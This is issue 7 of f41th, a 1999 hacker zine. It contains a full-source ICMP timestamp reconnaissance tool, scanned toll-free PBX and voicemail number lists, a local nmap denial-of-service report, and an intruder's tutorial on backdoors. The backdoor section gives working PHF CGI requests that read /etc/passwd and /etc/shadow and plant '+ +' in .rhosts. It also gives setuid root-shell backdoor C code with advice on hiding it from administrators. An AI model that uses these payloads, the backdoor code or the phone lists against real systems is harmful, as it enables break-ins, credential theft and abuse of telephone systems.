Copy Link
Add to Bookmark
Report
f41th Issue 07
[ http://darkcyde.system7.org ]
[ http://hybrid.dtmf.org ]
yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|
[ f41th issue 7 - July 1999 ]
[ f41th magazine is a production of D4RKCYDE ]
[ submissions: hybrid@dtmf.org downtime@webcrunchers.com ]
[ mailto: hybrid@dtmf.org downtime@webcrunchers.com ]
[ #darkcyde efnet ]
PURE FE4R
OOO-(z}-|[ F41th 7 Editorial ]--( hybrid )--{z)-|[OOO
OOO-(Z}-|[ Chronus ICMP Packet Timestamps ]--( rwxrwxrwx )--{Z)-|[OOO
OOO-(z}-|[ US 18OO Random Scan ]--( force )--{z)-|[OOO
OOO-(Z}-|[ Local? Linux DoS using nmap ]--( gov-boi )--{Z)-|[OOO
OOO-(z}-|[ Impementing Backdoors ]--( msinister )--{z)-|[OOO
OOO-(Z}-|[ UK Carrier Scan of O8OO917[XXXX] ]--( faith )--{Z)-|[OOO
OOO-(z}-|[ Qpop Trojan Installer ]--( gov-boi )--{z)-|[OOO
OOO-(Z}-|[ Rolling Deep ]--( tgb )--{Z)-|[OOO
OOO-(z}-|[ 5ESS Compact Digital Exchanges ]--( hybrid )--{z)-|[OOO
OOO-(Z}-|[ UK Scan of Exchange O8OO672[XXX] ]--( faith )--{Z)-|[OOO
OOO-(z}-|[ SUIDcyde Bugtraq Review ]--( bodie )--{z)-|[OOO
OOO-(Z}-|[ DoD Communication networks DMS ]--( hybrid )--{Z)-|[OOO
OOO-(z}-|[ ICQ Conspiracy ]--( camel )--{z)-|[OOO
OOO-(Z}-|[ Pearl Programming ]--( zomba )--{Z)-|[OOO
-----------------------------------------------------------------------
D4RKCYDE
[hybrid] [downtime] [zomba] [force] * #darkcyde EfNet (no lamerz)
[shadowx] [elf] [msinister] [shylock] * http://darkcyde.system7.org
[lowtek] [digiphreq] [bodie] [sintax] * hybrid@dtmf.org
[nino] [microwire] * downtime@webrunchers.com
SHOUTZ
[b4b0] [9x] [ch1ckie] [extriad] [kraise] [sonicborg] [jasun] [aktiver]
[knight] [siezer] [oeb] [skyper] [typeo] [tgb] [camel] [gov-boi] [rwx]
[monty] [phace] [psyclone] [vixen] [port] [mranon] [w1rep41r] [oclet]
[l0r1] [ginger] [tip] [milkman] [ph1x] [gr1p] [prez] [network] [lewp]
[xio] [backa] [loco] [thewombat] [jd] [spacity] [bind] [lusta] [subzz]
[skalar] [voltage] [simmeth] [kryptus] [pbxphreak] [gb] [smiler] [jorge]
-----------------------------------------------------------------------
<Fatality> [hybrid-] the king of idle has arrived.
*[JaSuN]* Beer, Sand, Rollercoasters, Computers and Communications."
<bodie> hybrids dog pissed on me
<bodie> i'll kill that shitty thing
<hybrid-> someone give me a quote i cant put at the top of f41th 7
<shadow_x> "there can be only one"
<[JaSuN]> blasted from the past, out into the future
<[JaSuN]> heh
<[JaSuN]> "Whats the Infoz?
<[JaSuN]> "Gimme the Infoz?
<Kryptus> elvis has left the building
*** ani_slut has quit IRC (Read error: 0 (Error 0))
"30 million nerds communicating with people they don't know, about
things they don't understand, for reasons they can't explain."
-- Guy Kawasaki, Apple Computer
"I have yet to see any pornography on the Internet....mainly
because I'm not looking for it. If you're finding for it, you're
looking for it. Either quit looking for it or quit complaining
about your sucess."
-- Don Shorock
Usenet is like a herd of performing elephants with diarrhea --
massive, difficult to redirect, awe-inspiring, entertaining, and a
source of mind-boggling amounts of excrement when you least expect
it.
-- Author unknown
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Editorial ]::::::::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
-->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
Welcome to f41th 7. I can't believe that we have managed to get 3 issues of
f41th out in 1 month, getting a zine together is not easy work, it takes alot
of time to write the idividual articles in the issue, I'd like to say thanks
to everyone that has contributed to this issue and previous issues of f41th..
It's getting better all the time, keep the articles rolling in :) On another
note, we have noticed a higher level of .gov and .mil hits on the darkcyde
f41th distro sites. For example..
shepherd.hurlburt.af.mil - - [07/Jun/1999:16:49:39 -0500] "GET faith6.txt
gw.assist.mil - - [08/Jun/1999:11:33:31 -0500] "GET faith6.txt
coni-68.conicit.gov.ve - - [07/Jun/1999:10:26:58 -0500] "GET faith6.txt
gsnmail.gov.tw - - [07/Jun/1999:13:57:46 -0500] "GET faith6.txt
irmbb66.nigms.nih.gov - - [07/Jun/1999:16:54:49 -0500] "GET faith6.zip
operations.dera.gov.uk - - [12/Jun/1999:00:06:28 -0500] "GET faith6.txt
dera.gov.uk strikes fjear, goto www.dera.gov.uk to take a look. We've also
had hits from various telcos such as Cable&Wireless, and US RBOCs such as
USWest and other BELL*.*'s. According to alot of people I have spoken to,
dera.gov.uk regualy visit hp sites, and probably database them all.. However,
if they wanna read f41th it's upto them, we're not complaining. Sinse the
last issue I've noticed alot of servers are mirroring the f41th archives, I'd
like to ask if you want to mirror our zine please email me or another
darkcyde member so we can list you in the f41th mirrors list. If you want to
submit anything to f41th, please email us or me, or comto #darkcyde EFNET,
/dcc send hybrid 0d4yz.txt .. peace, enjoy the issue, take it easy. hybrid.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Chronos ]:::::::[OO--[ by rxwrwxrwx ]---[ rwxrwxrwx@soldier.net ]::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Chronos
-------
Chronos is a tool that can be used to measure the degree of synchronization
between hosts. It uses ICMP Timestamp packets to ask those hosts for their
actual times (with microsecond precision).
Some real-world applications for Chronos include checking whether your NTP-
enabled machines are working as expected or not. Also time differences
between certain hosts can be dangerous from a security point of view:
`slight' delays (in the range or minutes or even less depending on the load
of the network/servers) can make it a real pain when tracking things down in
logs from those hosts. Another (maybe more useful) way of using chronos is to
aid in remotely determining certain characteristics of network topologies
like knowing if several different IP addresses correspond to the same
physical machine.
for example:
Non-authoritative answer:
Name: random.isp.net
Address: 207.201.167.77
Non-authoritative answer:
Name: some.ip.alias.of.random.isp.net
Address: 209.170.47.7
# ./chronos -l 192.168.1.13 -s 0 -u 500000 207.201.167.77 209.170.47.7
Chronos - measures synchronization between hosts
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
Fasten your seat belts, this is gonna hurt!!
host == 207.201.167.77 id == 0, seq == 30526, icmp_ttime == 36715519
host == 209.170.47.7 id == 0, seq == 10405, icmp_ttime == 36715522
host == 207.201.167.77 id == 1, seq == 25611, icmp_ttime == 36715852
host == 209.170.47.7 id == 1, seq == 58905, icmp_ttime == 36715970
host == 207.201.167.77 id == 2, seq == 33126, icmp_ttime == 36716350
host == 209.170.47.7 id == 2, seq == 1421, icmp_ttime == 36716460
host == 207.201.167.77 id == 3, seq == 46280, icmp_ttime == 36716851
host == 209.170.47.7 id == 3, seq == 44840, icmp_ttime == 36716854
host == 207.201.167.77 id == 4, seq == 60411, icmp_ttime == 36717350
host == 209.170.47.7 id == 4, seq == 63000, icmp_ttime == 36717460
host == 207.201.167.77 id == 5, seq == 60383, icmp_ttime == 36717850
host == 209.170.47.7 id == 5, seq == 12962, icmp_ttime == 36717853
--- statistics ---
These are synchronized. We assume the IP addresses do, in fact, correspond to
the same physical machine (which is true for this example) thus allowing us
to narrow things down to the key servers of a network.
another example:
Name: example.com
Addresses: 197.77.140.5, 197.77.140.6
Aliases: www.example.com
# ./chronos -l 192.168.1.13 -s 0 -u 500000 195.77.240.5 195.77.240.6
Chronos - measures synchronization between hosts
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
Fasten your seat belts, this is gonna hurt!!
host == 197.77.140.5 id == 0, seq == 5450, icmp_ttime == 44024897
host == 197.77.140.6 id == 0, seq == 55100, icmp_ttime == 36591075
host == 197.77.140.5 id == 1, seq == 24786, icmp_ttime == 44025375
host == 197.77.140.6 id == 1, seq == 35820, icmp_ttime == 36591565
--- statistics ---
As you can see these are obviously not in-sync.
The code presented here is just a proof of concept and lacks some key
routines (like automagickally analysing the results), but it demonstrates the
technique.
Chronos/Makefile100644 0 0 732 6732275270 12204 0ustar rootroot# Makefile
CC = gcc
CFLAGS = -D_REENTRANT -Wall -O3 -funroll-loops -finline-functions
LIBS = -lpthread
OBJS = main.o tstamp.o engine.o stats.o
all: chronos
chronos: $(OBJS)
$(CC) $(CFLAGS) -o chronos $(OBJS) $(LIBS)
main.o: main.c engine.h
$(CC) $(CFLAGS) -c main.c
tstamp.o: tstamp.c tstamp.h
$(CC) $(CFLAGS) -c tstamp.c
engine.o: engine.c engine.h
$(CC) $(CFLAGS) -c engine.c
stats.o: stats.c stats.h
$(CC) $(CFLAGS) -c stats.c
clean:
rm -f core chronos *.o
Chronos/engine.c100644 0 0 4703 6732274545 12203 0ustar rootroot/*
[ e n g i n e . c ]
Handles the setting up of timers and scheduling of threads
Version: $Id: engine.c,v 1.7 1999/04/28 15:04:18 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pthread.h>
#include <signal.h>
#include <unistd.h>
#include <limits.h>
#include <sys/types.h>
#include <sys/time.h>
#include "engine.h"
#include "tstamp.h"
int iters = -1; /* number of times we've queried all the hosts */
static void spawn_threads(int signum);
static void launch_it(void *arg);
int
init_timer_interrupt(void)
{
struct sigaction act;
memset(&act, 0, sizeof(act));
act.sa_handler = spawn_threads;
act.sa_flags = SA_RESTART;
if (sigaction(SIGALRM, &act, NULL) == -1)
return -1;
else
return 0;
}
int
setup_timer(time_t secs, time_t usecs)
{
struct itimerval timer;
timer.it_interval.tv_sec = secs;
timer.it_interval.tv_usec = usecs;
timer.it_value = timer.it_interval;
if (setitimer(ITIMER_REAL, &timer, NULL) == -1)
return -1;
else
return 0;
}
static void
spawn_threads(int signum)
{
u_int i;
int retval;
pthread_t worker_tid[nthreads];
pthread_attr_t worker_attr;
printf("\n");
++iters;
/* We set our threads' scheduling policy so that they run in realtime
and make them detached by default since we don't need their return values */
if (pthread_attr_init(&worker_attr) != 0) {
fprintf(stderr, "pthread_attr_init failed\n");
exit(-1);
}
if (pthread_attr_setdetachstate(&worker_attr, PTHREAD_CREATE_DETACHED) != 0) {
fprintf(stderr, "pthread_attr_setdetachstate failed\n");
exit(-1);
}
if (pthread_attr_setschedpolicy(&worker_attr, SCHED_RR) != 0) {
fprintf(stderr, "pthread_attr_setschedpolicy failed\n");
exit(-1);
}
for (i = 0; i < nthreads; i++) {
if ((retval = pthread_create(&worker_tid[i], &worker_attr, (void *) &launch_it, (void *) i)) != 0) {
fprintf(stderr, "pthread_create failed\n");
if (retval == EAGAIN)
continue;
exit(-1);
}
}
if (pthread_attr_destroy(&worker_attr) != 0) {
fprintf(stderr, "pthread_attr_destroy failed\n");
exit(-1);
}
}
void
launch_it(void *arg)
{
u_short seqnum;
struct timeval tv;
gettimeofday(&tv, NULL);
srand(tv.tv_usec);
seqnum = (rand() % USHRT_MAX);
if (timestamp(dest[(u_int) arg], iters, seqnum) == 0)
fprintf(stderr, " host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9s\n",
dest[(u_int) arg], (u_short) iters, seqnum, "*failed*");
pthread_exit(NULL);
}
Chronos/engine.h100644 0 0 1022 6732274571 12176 0ustar rootroot#ifndef _ENGINE_H
#define _ENGINE_H
/*
[ e n g i n e . h ]
Handles scheduling of threads and timers
Version: $Id: engine.h,v 1.4 1999/04/28 15:04:22 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/time.h>
u_int nthreads; /* number of concurrent working threads */
u_char **dest; /* array with addesses of destination hosts */
extern int init_timer_interrupt(void);
extern int setup_timer(time_t secs, time_t usecs);
#endif /* _ENGINE_H */
Chronos/in_cksum.c100644 0 0 1107 6711625424 12532 0ustar rootroot/*
[ i n _ c k s u m . c ]
Version: $Id: in_cksum.c,v 1.1 1999/04/23 17:13:43 coder Exp $
*/
#include <sys/types.h>
int
in_cksum(u_short *p, int n)
{
register u_short answer;
register long sum = 0;
u_short odd_byte = 0;
while (n > 1) {
sum += *p++;
n -= 2;
}
/* mop up an odd byte, if necessary */
if (n == 1) {
*(u_char *) (&odd_byte) = *(u_char *) p;
sum += odd_byte;
}
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = (int)~sum; /* ones-complement, truncate*/
return (answer);
}
Chronos/in_cksum.h100644 0 0 346 6711625170 12521 0ustar rootroot#ifndef _IN_CKSUM_H
#define _IN_CKSUM_H
/*
[ i n _ c k s u m . h ]
Version: $Id: in_cksum.h,v 1.3 1999/04/23 13:52:35 coder Exp $
*/
#include "in_cksum.c"
extern int in_cksum(u_short *p, int n);
#endif /* _IN_CKSUM_H */
Chronos/main.c100644 0 0 4475 6732275243 11664 0ustar rootroot/*
[ m a i n . c ]
Glues it all together.
Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
usage: # ./chronos -l 192.168.1.111 -s 0 -u 500000 `nmap -sP -PI network/24 \
| grep "Host" | cut -f 2 -d '(' | grep "appears to be up" | cut -f 1 -d ')'`
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include "engine.h"
#include "stats.h"
#include "main.h"
extern u_int nthreads;
extern u_char **dest;
static void usage(char *name);
static void banner(void);
int
main(int argc, char *argv[])
{
int i, c;
u_char *local_ip = NULL;
time_t secs = 1, usecs = 0; /* default interval set to 1 second */
if (geteuid() != 0)
fprintf(stderr, "Sorry, you don't have permissions to run this program\n"), exit(-1);
if (argc < 2)
usage(argv[0]), exit(-1);
while((c = getopt(argc, argv, "l:s:u:")) != -1) {
switch (c) {
case 'l': /* local ip address */
local_ip = strdup(optarg);
break;
case 's': /* seconds */
secs = strtoul(optarg, NULL, 10);
break;
case 'u': /* microseconds */
usecs = strtoul(optarg, NULL, 10);
break;
}
}
if (inet_aton(local_ip, &local_addr) == -1)
perror("inet_aton"), usage(argv[0]), exit(-1);
free(local_ip);
nthreads = argc - optind;
/* copy each ip address passed as command line parameter into an array (which we firstly allocate) */
if ((dest = (u_char **) calloc(nthreads, sizeof(u_char *))) == NULL)
perror("calloc"), exit(-1);
for (i = 0; i < nthreads; i++)
dest[i] = strdup(argv[optind + i]);
banner();
if (init_break_interrupt() == -1)
fprintf(stderr, "Couldn't setup SIGINT handler\n"), exit(-1);
if (init_timer_interrupt() == -1)
fprintf(stderr, "Couldn't setup SIGALRM handler\n"), exit(-1);
printf("Fasten your seat belts, this is gonna hurt!!\n");
if (setup_timer(secs, usecs) == -1)
fprintf(stderr, "Couldn't setup timer\n"), exit(-1);
for ( ; ; );
free(dest);
exit(0);
}
void
usage(char *name)
{
banner();
fprintf(stderr, "usage: %s -l <local ip address> [-s <secs>] [-u <usecs>] <destination 1> [destination 2] [destination 3] ...\n", name);
}
void
banner(void)
{
printf("Chronos - measures synchronization between hosts\n");
printf("(c) 1999 by 777 <rwxrwxrwx@soldier.net>\n");
}
Chronos/main.h100644 0 0 517 6711705462 11640 0ustar rootroot#ifndef _MAIN_H
#define _MAIN_H
/*
[ m a i n . c ]
Glues it all together.
Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $
1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <sys/types.h>
#include <netinet/in.h>
#define ARGSIZE (strlen(argv[optind + i]) + 1)
struct in_addr local_addr;
#endif /* _MAIN_H */
Chronos/stats.c100644 0 0 1360 6732275154 12065 0ustar rootroot/*
[ s t a t s . c ]
Deals with the analysis and display of the results
Version: $Id: stats.c,v 1.1 1999/04/28 15:04:37 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include "engine.h"
#include "main.h"
static void analyse(int signum);
static void show_results(void);
int
init_break_interrupt(void)
{
struct sigaction act;
memset(&act, 0, sizeof(act));
act.sa_handler = analyse;
act.sa_flags = SA_ONESHOT | SA_NOMASK;
if (sigaction(SIGINT, &act, NULL) == -1)
return -1;
else
return 0;
}
static void
analyse(int signum)
{
show_results();
exit(EXIT_SUCCESS);
}
static void
show_results(void)
{
printf("\n--- statistics ---\n");
}
Chronos/stats.h100644 0 0 437 6732275171 12055 0ustar rootroot#ifndef _STATS_H
#define _STATS_H
/*
[ s t a t s . c ]
Deals with the analysis and display of the results
Version: $Id: stats.h,v 1.1 1999/04/28 15:04:41 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
extern int init_break_interrupt(void);
#endif /* _STATS_H */
Chronos/tstamp.c100644 0 0 6205 6732274437 12245 0ustar rootroot/*
[ t s t a m p . c ]
Sends an ICMP Timestamp request and reads the reply
Version: $Id: tstamp.c,v 1.10 1999/04/28 15:04:44 coder Exp coder $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <linux/in_systm.h>
#include "in_cksum.h"
#include "tstamp.h"
#include "main.h"
#define IPHDRSIZE sizeof(struct iphdr)
extern struct in_addr local_addr; /* we get this from main.h */
/* sends dst an icmp timestamp request and returns the reply or 0 if it failed */
u_int32_t
timestamp(char *dst, u_short id, u_short seq)
{
int sockfd;
struct sockaddr_in src_sa, dst_sa;
struct icmp *icmp;
struct in_addr dst_addr;
char buf[IPHDRSIZE + ICMP_TSLEN]; /* this is the maximum size we'll ever need */
int buflen;
/* We open a raw ICMP socket, after that we bind() it to the source address
and connect() it to the destination address. Thus we enforce that the kernel
passes to the socket only ICMP packets which match the relevant addresses.
It also explains why we use send() and recv() instead of sendto() and recvfrom()
(we're dealing with connected sockets) */
if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
return 0;
if (!(inet_aton(dst, &dst_addr))) {
close(sockfd);
return 0;
}
memset(&src_sa, 0, sizeof(struct sockaddr_in));
memset(&dst_sa, 0, sizeof(struct sockaddr_in));
src_sa.sin_family = dst_sa.sin_family = AF_INET;
/* we have to explicitly bind our socket to a specific address instead of INADDR_ANY
in order to receive correctly icmps sent to aliases ips of ours */
src_sa.sin_addr = local_addr;
dst_sa.sin_addr = dst_addr;
if (bind(sockfd, (struct sockaddr *) &src_sa, sizeof(struct sockaddr_in)) == -1) {
perror("bind");
close(sockfd);
return 0;
}
if (connect(sockfd, (struct sockaddr *) &dst_sa, sizeof(struct sockaddr_in)) == -1) {
perror("connect");
close(sockfd);
return 0;
}
/* Next, ICMP Timestamp-request header is built and sent */
memset(buf, 0, sizeof(buf));
icmp = (struct icmp *) buf;
icmp->icmp_type = ICMP_TSTAMP;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
icmp->icmp_id = id & 0xffff;
icmp->icmp_seq = seq & 0xffff;
icmp->icmp_otime = (u_int32_t) time(NULL);
icmp->icmp_cksum = in_cksum((u_short *) icmp, ICMP_TSLEN);
if (send(sockfd, buf, ICMP_TSLEN, 0) == -1) {
perror("send");
close(sockfd);
return 0;
}
/* Now it's time to read the reply */
memset(buf, 0, sizeof(buf));
buflen = IPHDRSIZE + ICMP_TSLEN;
if (recv(sockfd, buf, buflen, 0) > 0) {
icmp = (struct icmp *) (buf + IPHDRSIZE);
if ((icmp->icmp_type == ICMP_TSTAMPREPLY) && (icmp->icmp_id == (id & 0xffff)) && (icmp->icmp_seq == (seq & 0xffff)))
printf(" host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9u\n", dst, id, seq, ntohl(icmp->icmp_ttime));
else {
close(sockfd);
return 0;
}
} else {
close(sockfd);
return 0;
}
id++;
seq++;
close(sockfd);
return (ntohl(icmp->icmp_ttime));
}
Chronos/tstamp.h100644 0 0 644 6732274477 12237 0ustar rootroot#ifndef _TSTAMP_H
#define _TSTAMP_H
/*
[ t s t a m p . h ]
Sends an ICMP TimeStamp request and handles the reply
Version: $Id: tstamp.h,v 1.5 1999/04/27 14:16:04 coder Exp $
(c) 1999 by 777 <rwxrwxrwx@soldier.net>
*/
#include <sys/types.h>
/* sends dst an icmp timestamp request and returns the reply or 0 if it failed */
extern u_int32_t timestamp(char *dst, u_short id, u_short seq);
#endif /* TSTAMP_H */
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ 18OO scan ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
18oo scan by force
telco...
--oOo---
622-7380 pbx at&t system network control centre maintanence group
574-6369 mci worldcom paging system
654-3211 us watts enter authorisation code
982-7144 pbx some telco access system
472-1175 v south westen bell
982-7147 pbx north-tech of mci worldcom
829-0030 v mci
829-0026 fax/carrier
220-4818 v mci metro
786-9445 conference calling centre
475-4455 v conf centre passcode please
[1-888] 622-6823 pbx at&t service and maintanence single point number
[1-888] 333-0879 conf centre
carriers...
--oOo------
535-2648 carrier wouldn't connect
567-1745 carrier
232-1249 carrier
232-1968 carrier
232-1863 carrier
599-0262 carrier
599-0861 carrier? continuos carrier/fax tone
599-0477 carrier/fax
599-0298 carrier
321-2403 carrier
321-7468 carrier
321-1542 carrier
321-1173 carrier
321-8619 carrier
321-3756 carrier
321-2780 carrier? weird tone
321-5352 carrier
vmbs...
--oOo--
232-1279 vmb lots of options
232-1765 vmb
321-0103 vms mm k-mart resource centre
321-2566 pbx vms dell micro products
321-6909 vms mm
321-8691 pbx vms
466-9222 octel direct
331-1025 vms minneapolis police and fire
2O8-9996
227-O8OO
231-1OOO
285-3222
285-6399
322-5889
345-6323
418-2292
423-585O
433-6245
455-115O
456-1188
466-53OO
466-9222
476-2O44
539-5488
577-9997
667-8424
685-391O
72O-9OO4
72O-9O22
726-2363
746-7766
777-1495
777-17O8
777-6266
777-9633
792-272O
829-OO17
858-3651
868-5995
887-OO11
966-9996
tones...
--oOo---
535-2682 dialtone
321-6228 dialtone [you have dialled an invalid account code]
535-2151 dialtone
232-1777 dialtone [dialled 1800 and it rings somewhere]
232-1282 dialtone [dialled 1800 and it rang a residential number?]
321-6935 dialtone [you have dialled an invalid account code]
321-8593 dialtone
232-1243 beepboop tone
232-1198 beepboop tone
232-1922 beepboop tone
321-6891 beepboop tone
321-0301 beepboop tone
321-5963 beepboop tone
321-9002 beepboop tone
535-2361 tone
535-2456 weird siren tone
other...
--oOo---
535-2056 na
837-4391 rec unable to answer at present please try later
force...
--oOo---
force007@hotmail.com
uk vmb o8oo 919355
us vmb 18oo 331o17, 6, 4328
'my middle finger won't go down, how do i wave?'
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ nmap DoS ]::::::::[OO--[ by gov-boi ]---[ hotmetal@hack.co.za]:::::
-->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]::::::::::::::
subject: (local?) linux DoS using nmap
Good day..
I appologize if this is old but seems still to be
working/active on my own server. (slackware 4.0.0).
I would be interested to know which other distro's
this works against.
Tested against:
slackware 4.0.0
debian 2.1
Redhat 6.0
I became aware of this when local users begun
to launch DoS attacks.
kernel:~$ nmap 127.[0-255].[0-255].[0-255] -p 21 -sT
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on localhost (127.0.0.1):
Port State Protocol Service
21 open tcp ftp
Interesting ports on (127.0.0.2):
Port State Protocol Service
21 open tcp ftp
<snip>
and it keeps going untill the +/-280th packet..
<snip>
Interesting ports on (127.0.1.32):
Port State Protocol Service
21 open tcp ftp
No ports open for host (127.0.1.33)
No ports open for host (127.0.1.34)
No ports open for host (127.0.1.35)
etc.. etc..
<snip>
I havent tested it on remote machines,
but this looks like a tcp/syn flood?
Anyhow, local users can shutdown any
local daemon running on any port.
(apache was the only service
that remaining running.)
The rest of the other services became
unusable/(dead?).
Any ideas how one could prevent this?
Sorry again if this is old.
Regards
hotmetal of (src)
hotmetal@hack.co.za
( www.hack.co.za )
(e x p l o i t m a t r i x)
(world domination in progress)
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Backdoors ]::::::::::::[OO--[ by msinister ]---[ ]::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<><><><><><><><><><><><><><><><><>
<> <>
<> BACK DOORS AND HOW TO <>
<> GET ROOTS FROM A NON <>
<> ROOTSHELL <>
<> <>
<> BY: MISTER - SINISTER <>
<> <>
<><><><><><><><><><><><><><><><><>
berfore startin the articale i would to thnk very much to:
f0x malder!
the leetest hacker/programer i know in the world! (and dont argue!)
BACKDOORS:
Since hackers have breaked in into systems they wanted to OWEN them
meanin: to have access all the time to the system and not havin to hack it
every time they want to get in and get root.
there are many types of backdoor and i'll discus some of them here and
will (hopefuly) show you the reader some ways of makin them and getin root
from a simple user shell in some sytem.
PASSWORD DOORS
A way of gainin access is to get the /etc/passwd or /etc/shadow file and
tryin to crack it those givin u the abilty to telnet into the system and
enterin as a root.
if you have a shell in the system and u do have the prometion to read the
file (passwd or shadow) then congrats u have got a new root
just take the (with your mouse dont copy the file) root line for example:
root:tJWOCaNGtQAtI:0:0:Super-User:/:/usr/local/bin/bash
and run on it some kind of a passwd cracker there are alot of this over
the internet i'm sure you can find out one.
an other way of gainin the PASSWD file is via the knowen bug PHF (it still
exist }:) so lets say you have found an host the has PHF and u wanna use
it well via PHF u arent exactly root but u have enough to get your hands
on the /etc/passwd or /etc/shadow file (not allways but still there is a
chance) so here is how you do it:
GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/passwd
this line will do this (if u were a user in the system)
14:21 ~root@SINISTER /root [10]# cat /etc/passwd
and this line will do this on the system:
GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/shadow
14:21 ~root@SINISTER /root [10]# cat /etc/shadow
now after u have gotten the passwd file u know how to gain a root access
so here is our first root (hopefuly)
THE '+ +' IN .rhosts ROOT
here is another way of gainin root also via PHF (or if u have any other
way to tryin and echo '+ +' to the .rhosts file) the '+ +' means every one
could rlogin into the system with out any passwds (nice heh?)
well here is how to do it via PHF:
GET /cgi-bin/phf?Qalias=x%0aeval%20echo%20'%2b%20%2b'%20>%20.rhosts
this line is equivlent to
14:21 ~root@SINISTER /root [12]# echo '+ +' > .rhosts
and if u have managed to echo it then u got a new root all u have to do
now is to rlogin into the host (i'm sure u know after u are root in the
system what to do :)
TELNET BACKDOORS:
A telnet backdoor allows to telnet as a root right away
when u telnet to a host the inetd listens to the port and then receives
the connection and then passes it to in.telnetd and then opens the program
login. when doin this the machine checks for things like type of the term
(usaly VT100) and then requires authentication hackers have changed it
that no authentication will be needed (pretty cool heh?)
CRONJOB BACKDOORS
A realy cool way of breakin into a system is to tell the crontab to a run
a program at a certain time and then u can get into the system for
example:
14:36 ~root@SINISTER /root [18]# crontab -l
# If you don't want the output of a cron job mailed to you, you have to
direct
# any output to /dev/null. We'll do this here since these jobs should run
# properly on a newly installed system, but if they don't the average
newbie
# might get quite perplexed about getting strange mail every 5 minutes.
:^)
#
# Run the 'atrun' program every 5 minutes
# This runs anything that's due to run from 'at'. See man 'at' or 'atrun'.
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/lib/atrun 1>
/dev/null 2> /dev/null
# This touches a filename in the temp directory so that you can see cron
#is
# working if the timestamp is current. Comment it out if it bugs you. :^)
# * * * * * touch /tmp/.crond_running
we can see that my crontab runs every five minutes a program called
'atrun' into /dev/null in the same way we can tell to the hacked host to
run every day at a specific time a program that opens all ports (just a
dumb example but u know where i'm gettin to :)
HOW TO MAKE A BACKDOOR
well now that u know a litle (realllllllly lil) about backdoors lets try
to make one our self.
here is a simple (probebly useles) but it might some time work :)
main()
{
if (getuid() == /* here enter your UID */)
{
setuid(0);
setgid(0);
system("/bin/csh") /* i like C shell more then bash */
}
}
as u can see what u have told to the computer to do is this: if the user
id is mine then plz change my user id and gimme root :) (arent we modest
in our requests :)
this file should compile on any system but not the same of gettin root :(
since it doesnt require any passwd or anythin else it would be a great
idea to hide it . (this method is only if u have a shell in a system)
lets say i have goten a shell and i want to get root and i also want a
passwd ? ok this can be arranged to :) here is an example for a more
sufisticated backdoor:
main(int argc, char *argv[])
{
if (argc != 2)
{
printf("usage: %s file name\n", argv[0]);
exit(1);
}
/* lets stop here and analyze waht we have dont.
* incase the root finds out this file and wants to check it and will type
* the name of the file that gives us root all he will get is
* > usage: [the name that u called your backdoor] file name
* here is a tip dont call your file backdoor :)
* ok lets go on with the program
*/
if (!strcmp(argv[0],"/* enter here your passwd */"))
{
setuid(0);
setgid(0);
system("/bin/csh");
}
else
printf("%s : %s file has been backed!\n", argv[0], argv[1]);
}
